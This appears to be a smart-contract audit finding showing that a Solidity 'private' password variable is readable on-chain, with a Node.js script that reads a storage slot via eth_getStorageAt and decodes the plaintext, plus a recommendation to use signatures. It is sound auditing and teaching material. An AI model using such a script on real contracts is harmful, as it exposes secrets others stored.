Despite the `private` visibility of the `s_password` variable, it can still be read by interacting with the blockchain directly.
The Solidity documentation has a specific note on this case:
Everything that is inside a contract is visible to all observers external to the blockchain. Making something private only prevents other contracts from accessing and modifying the information, but it will still be visible to the whole world outside of the blockchain.
This means that even though other contracts cannot read the variable, anyone can read the raw storage slot via `eth_getStorageAt` and decode it. Here is a simplified example (it works only with short strings, i.e. 31 bytes or less, which Solidity stores inline in the slot) of a script that retrieves the stored data:
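As an added example (not the finding's own script), the following Node.js code builds the `eth_getStorageAt` JSON-RPC call and decodes a Solidity short string from the returned 32-byte word. It assumes, as labelled in the comments, that `s_password` occupies storage slot 1 (a hypothetical layout in which an owner address occupies slot 0), that a node is reachable at the hypothetical `RPC_URL`, and that the contract address shown is a placeholder. The sample storage word is constructed inline so the decoder runs offline; the long-string layout (length > 31 bytes, data at `keccak256(slot)`) is detected and rejected rather than decoded.

```javascript
// Added example, not code from the original finding.
// Assumptions (labelled): s_password is in storage slot 1, the node is at
// RPC_URL, CONTRACT is a placeholder address. Only the Solidity short-string
// layout (<= 31 bytes, data left-aligned, lowest byte = 2 * length) is decoded.

const RPC_URL = "http://127.0.0.1:8545";                       // hypothetical local node
const CONTRACT = "0x5FbDB2315678afecb367f032d93F642f64180aa3"; // placeholder address
const PASSWORD_SLOT = 1;                                       // assumed slot of s_password

// Decode one 32-byte storage word that holds a Solidity string.
// Short form: data bytes left-aligned, low byte holds 2 * length (even).
// Long form: whole word is 2 * length + 1 (odd); the bytes live at
// keccak256(slot), so this decoder refuses it instead of guessing.
function decodeShortString(slotHex) {
  const hex = slotHex.replace(/^0x/i, "").toLowerCase().padStart(64, "0");
  if (hex.length !== 64) throw new Error("storage word must be 32 bytes (64 hex chars)");
  const bytes = Buffer.from(hex, "hex");
  const marker = bytes[31];
  if (marker & 1) {
    const length = (BigInt("0x" + hex) - 1n) / 2n;
    throw new Error(`long string of ${length} bytes: data is at keccak256(slot), not in the slot`);
  }
  const length = marker / 2;
  if (length > 31) throw new Error("invalid short-string length byte");
  return bytes.subarray(0, length).toString("utf8");
}

// Build the JSON-RPC request body for eth_getStorageAt(address, slot, block).
function storageRequest(address, slot, block = "latest") {
  return {
    jsonrpc: "2.0",
    id: 1,
    method: "eth_getStorageAt",
    params: [address, "0x" + BigInt(slot).toString(16), block],
  };
}

// Read the slot from a live node and decode it. Needs network access and
// Node 18+ (global fetch); it is not exercised by the offline sample below.
async function readPasswordFromChain(rpcUrl = RPC_URL, address = CONTRACT, slot = PASSWORD_SLOT) {
  const res = await fetch(rpcUrl, {
    method: "POST",
    headers: { "content-type": "application/json" },
    body: JSON.stringify(storageRequest(address, slot)),
  });
  const { result, error } = await res.json();
  if (error) throw new Error(error.message);
  return decodeShortString(result);
}

// Constructed sample word (not read from any chain): "myPassword" is 10 bytes,
// left-aligned, zero padded, with the low byte 0x14 = 2 * 10.
const SAMPLE_WORD = "0x" + "6d7950617373776f7264".padEnd(62, "0") + "14";

console.log(decodeShortString(SAMPLE_WORD)); // myPassword
```

Against a real node, `readPasswordFromChain()` returns the plaintext password regardless of the `private` keyword; if the slot's low bit is set the string is longer than 31 bytes and the next read has to target `keccak256(slot)`.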
Severity: High
Tools Used: Hardhat
Storing plaintext passwords is generally considered bad security practice; for off-chain systems, salted password hashing (https://en.wikipedia.org/wiki/Salt_(cryptography)) is the usual defence against a range of attacks. On a public blockchain even a salted hash gives little protection, because the hash, the salt and the contract code are all readable and a low-entropy password can be brute-forced offline. Since we are dealing with the blockchain, the general approach is to consume signatures (or simply check `msg.sender`) instead of passwords, as a private/public key pair is a better representation of the user than a password.
Private functions and state variables are only visible within the contract they are defined in, not in derived contracts. In this context, `private` does not mean secret or confidential.